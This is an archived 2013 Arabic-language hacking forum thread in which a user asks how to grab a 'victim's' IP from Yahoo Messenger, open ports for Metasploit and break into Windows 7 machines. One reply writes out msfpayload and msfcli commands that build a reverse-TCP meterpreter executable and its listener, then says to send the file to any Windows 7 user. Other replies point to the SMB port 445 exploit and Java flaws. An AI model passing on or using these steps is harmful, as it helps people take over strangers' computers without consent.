development-point

development-point (https://vb.development-point.com/index.php)
-   حلول و مشاكل توزيعات أختبار الأخترآق (https://vb.development-point.com/forumdisplay.php?f=23)
-   -   [ سؤال ] بعض الاسئلة في الميتاسبلوت ارجو من الاخوة الدخول (https://vb.development-point.com/showthread.php?t=6400)

Security.Najaf 02-17-2013 11:54 AM

بعض الاسئلة في الميتاسبلوت ارجو من الاخوة الدخول
 
السلام عليكم شاهدت الكثير من شروحات فتح البورت واغلبها غير فعالة للاسف وارى الشخص الذي يريد ان يسأل لايجيد ايصال الفكرة لكي يستفاد الجميع من سؤالة طيب ,, عملت كم صورة للاستفسار ارجو من الخبراء الاجابة لكي يستفاد الجميع..

اولا السؤال المهم كيف اجلب ايبي الضحية الي معي بالياهو او بالفيس او بالهوتميل...

ثانيا بالنسبة لفتح البورت 4444 بالراوتر ...
طيب من افتح بورت اضع الايبي تبع الراوتر مثل هذي الصورة

http://im34.gulfup.com/ZKcLN.png
مركز تحميل الصور


او اضع الايبي الي يظهر لي بالباك تراك من اكتب ifconfig يظهر لي هذا الايبي هذا الي اضعة بالراوتر شوفو الصورة

http://im34.gulfup.com/ry1x2.png
مركز تحميل الصور


اي صورة صحيحة الاولى ...؟ او الصورة الثانية ..؟


بعد ما فتحت البورت نأتي الى خاصية DMZ بالراوتر نفس الاسئلة هل اضع ايبي الراوتر مثل هذي الصورة

http://im34.gulfup.com/GSOtg.png
مركز تحميل الصور



او اضع ايبي الي يظهرلي بالباك تراك ifconfig مثل هذي الصورة



http://im34.gulfup.com/dwctS.png
مركز تحميل الصور

اي صورة خياراتها صحيحة ؟؟؟؟ الاولى ام الثانية ؟؟؟؟


بعد فتح البورت نأتي الى الاختراق وصلت الى مرحلة rhost وضع ايبي الضحية
هكذا set rhost xxx.xxx.xxx.xxx
وصلت الى ايبي تبعي هكذا
set lhost هذا اضع الايبي الي يظهرلي في الباك تراك ifconfig
مثل هذي الصورة

http://im35.gulfup.com/JDa8m.png
مركز تحميل الصور

او اضع الايبي الخارجي مثل هذي الصورة

http://im35.gulfup.com/MswQe.png
مركز تحميل الصور
مركز تحميل الصور


وفي النهاية انا منصب الباك تراك وهمي على فيرتل بوكس هل الخيارات تبعي صحيحة ام لا شوفو الصورة هذي

http://im34.gulfup.com/GVfJ5.png
مركز تحميل الصور


اتمنى الاجابة من الكل لان هذا الموضوع مشكلة الجميع

وفي الختام اشكر كل من ساهم في الرد بالاجابات على الاسئلة .موفقين باذن الله

Security.Najaf 02-17-2013 11:56 AM

رد: بعض الاسئلة في الميتاسبلوت ارجو من الاخوة الدخول
 
مرحلة الاختراق | ممكن احد يكتب اوامر لاختراق وندوز 7 لانه صعب شوية وشكرا لكم.

saboteur 02-17-2013 12:38 PM

رد: بعض الاسئلة في الميتاسبلوت ارجو من الاخوة الدخول
 
http://im34.gulfup.com/ry1x2.png

هذة هي الصورة الصحيحة

http://im34.gulfup.com/dwctS.png

هذة هي الصورة الصحيحة


http://im35.gulfup.com/JDa8m.png

rhost ضع اي بي الضحية
lhost ضع الاي بي الخاص بالباكتراك(192.168.1.101) كما هو موضوح بالصورة فوق اذا كنت تخترق داخلي
اما اذا كنت تخترق خارجي ضع هذا الاي بي كما هو موضح بالصورة تحت

http://im35.gulfup.com/MswQe.png

http://im34.gulfup.com/GVfJ5.png

خيارات صحيحة 100%

===================================
مرحلة الاختراق | ممكن احد يكتب اوامر لاختراق وندوز 7 لانه صعب شوية وشكرا لكم.
ممكن توضح هذا السؤال شوية ؟





Security.Najaf 02-17-2013 01:17 PM

رد: بعض الاسئلة في الميتاسبلوت ارجو من الاخوة الدخول
 
الله عليك يا مبدع , والله تستاهل ماء العين.
حبيبي السؤال كالاتي :
انا اريد اخترقك مثلا هههه مجرد مثال ههه اريد اخترقك
انت منصب وندوز 7 ماهي الاوامر والثغرات المستخدمة اريد ثغرة تعمل على وندوز 7 غير الـ
set payload windows/meterpreter/reverse_tcp
سؤال اخر اذا نت معطل الدوس Dos معطل شاشة السوداء كيف اخترقك ؟
وبعد الاختراق يعني طبقت الاوامر صحيح اظهار الثغرات والاستغلال ....الخ كيف اعرف انني نجحت ماهو الدليل
ماهي الرسالة التي تظهر لي .؟
وبعد ما تم الاختراق كيف استخدم الخيارات مثلا اظهار الشاشة رفع السيرفر ...الخ

والسؤال الاهم كيف اجلب ايبي الضحية من الياهو ماسنجر

saboteur 02-17-2013 01:51 PM

رد: بعض الاسئلة في الميتاسبلوت ارجو من الاخوة الدخول
 
بالنسبة للسؤال الاول: طريقة اختراق ويندوز 7 بالميتااسبلويت تتم عن طريق استغلال الثغرات والمنافذ المفتوحة في جهاز الضحية او عن طريق عمل باك دور وارسالة للضحية مجرد ما يضغط علية يوصلك الضحية
بالنسبة للثغرات يمكنك زيارة هذا الموقع والتعرف علي احدث الثغرات
http://www.exploit-db.com/
بالنسبة للأختراق عن طريق المنافذ انت وشطارتك تفحص اي بي الضحية وتشوف المنافذ او البورتات المفتوحة بجهازة وتستغلها
بالنسبة للباك دور سوف اعطيك شرح كيفية عمل بايلود لأختراق ويندوز 7

افتح تريمنال ثم اكتب هذا السطر


msfpayload windows/meterpreter/reverse_tcp lhost=192.168.1.76 lport=4444 x > saboteur.exe

حيث:

192.168.1.76 = آيُ بيَ جهآزكَ
4444 = آلبورتَ
saboteur.exe = آسمُ آلسيرفرُ معُ آلصيغة

ثم تكتب الامر التالي في نف التريمنال


msfcli exploit/multi/handler payload=windows/meterpreter/recerse_tcp lhost=192.168.1.76 lport=4444 E

حيث:


192.168.1.76 = آيُ بيَ جهآزكَ
4444 = آلبورتَ

ثم تخرج الملف الناتج من مدير الملفات في الباكتراك
ثم ترسلة لأي شخص نظامة ويندوز 7

ملحوظة:
set payload windows/meterpreter/reverse_tcp
هذا ليست ثغرة وانما بيلود وهناك فرق كبير بين البايلود والثغرة
=======================

سؤال اخر اذا نت معطل الدوس Dos معطل شاشة السوداء كيف اخترقك ؟

شاشة الدوس لا يوجد لها صلة بموضوعنا ولا تؤثر في عملية الاختراق
واغلاق شاشة الدوس يؤدي الي توقف بعض البرامج عن العمل

=====================
هذة هي الصورة الصحيحة لضمان اختراق الضحية
والتي تدل علي نجاح عملية الاستهداف

http://3.bp.blogspot.com/-es7C36eeJD...7777777777.jpg

================
هناك بعض الاوامر يجب عليك تنفيذها بعد استهداف الضحية
بعدما تظهر لك هذة الرسالة يمكنك كتابة كلمة help سوف تجد كل اوامر الميتااسبلويت من رفع السيرفر وتصوير الشاشة وغيرها ... الخ

اما بالنسبة لمعرفة اي بي الضحية هناك ادوات في الباكتراك تعرفك كيفية جلب اي بي الضحية الذي تتكلم مع علي الياهو او الاسكاي بشرط تكون انت بتكلمة علي الباكتراك
وامور اخري ان شاء الله اطرحها قريبا

اتمني ان اكون افدتك ولو بالقليل ... بالتوفيق ان شاء الله


Dr..ViRuS 02-17-2013 02:22 PM

رد: بعض الاسئلة في الميتاسبلوت ارجو من الاخوة الدخول
 
اخي الغالي البورت مفتوح عندكـ 100 بس لازم تعمل له استغلال

مثلا تعمل بايولد وتجربو على نفسكـ ,وراح يوصلكـ التبليغ او تفحص البورت عبر ادهـ nmpa

او تستغل ثغرهـ وفي ثغرات جافا كثير ويزبط معاكـ انا رسلتكـ دورتي لحتراف الباك تراكـ

والله تطلع محترف باك تراك 100 موفق ..:)

Security.Najaf 02-17-2013 06:25 PM

رد: بعض الاسئلة في الميتاسبلوت ارجو من الاخوة الدخول
 
طيب اخواني كيف اعرف انو البورت معي مفتوح وكل شي تمام شنو الدليل انا طبقت كلام الاخ saboteur بالحرف الواحد لكن كيف اعرف انو الشغلة ضبطت معي ؟

saboteur 02-17-2013 06:39 PM

رد: بعض الاسئلة في الميتاسبلوت ارجو من الاخوة الدخول
 
اقتباس:

المشاركة الأصلية كتبت بواسطة سكيورتي النجف (المشاركة 21153)
طيب اخواني كيف اعرف انو البورت معي مفتوح وكل شي تمام شنو الدليل انا طبقت كلام الاخ saboteur بالحرف الواحد لكن كيف اعرف انو الشغلة ضبطت معي ؟


من ناحية كيفية معرفة البورت مفتوح ولا لا
مثل ما بتفحص البورت الخاص برنامج الاختراق الي بتشتغل عليية
ادخل علي الموقع هذا www.canyouseeme.org
ثم ادخل البورت المراد فحصة واضغط فحص
لوجائت كلمة (success) يبقا شغلك تمام
اما لو جائت كلمة (erorr) يبقا شغلك فية غلط

Viřŭs ɱŝf 02-21-2013 09:54 PM

رد: بعض الاسئلة في الميتاسبلوت ارجو من الاخوة الدخول
 
سبوتر مشاء الله

افادك افادة قوية

مافى داعى انى اتكلم


بس حبيبى
اولا

هدا

كل شىء تمام عندك زى الفل

بس مرحلة الاختراق الخارجى مش هتم فى يوم وليلة

لان اصعب شىء فى الهكر

هو الاختراق الخارجى او الاستهداف بمعنى صح


مفيش حاجة اسمها انك تخترق حد من غير ما تبعت لة شىء

ازاى هل يتم الاستهداف بلاسلكى


حبيبى فى جميع الاحوال بيكون الاستهداف بيرسل شىء ك بايلود او باكدور

لكن منها ماهو مباشر

ومنها ماهو غير مباشر

ال هو بيكون بالبايلود للاى بى بيحدث اتصال مباشر دون علم الضحية

وجرب ثغرة 445

ولسة شغالة

وما تسمع كلام ان احد يقولك انها تسكرت او اى شىء من هاد

واى شىء انت عاوزة يا حسنين احنا فى الخدمة إن شاء الله


CHESTER 619 TOP 02-22-2013 04:53 PM

رد: بعض الاسئلة في الميتاسبلوت ارجو من الاخوة الدخول
 
افادوك الشباب الله يعطيهم العافية


الساعة الآن 04:01 PM

Powered by vBulletin® Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.
development-point

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47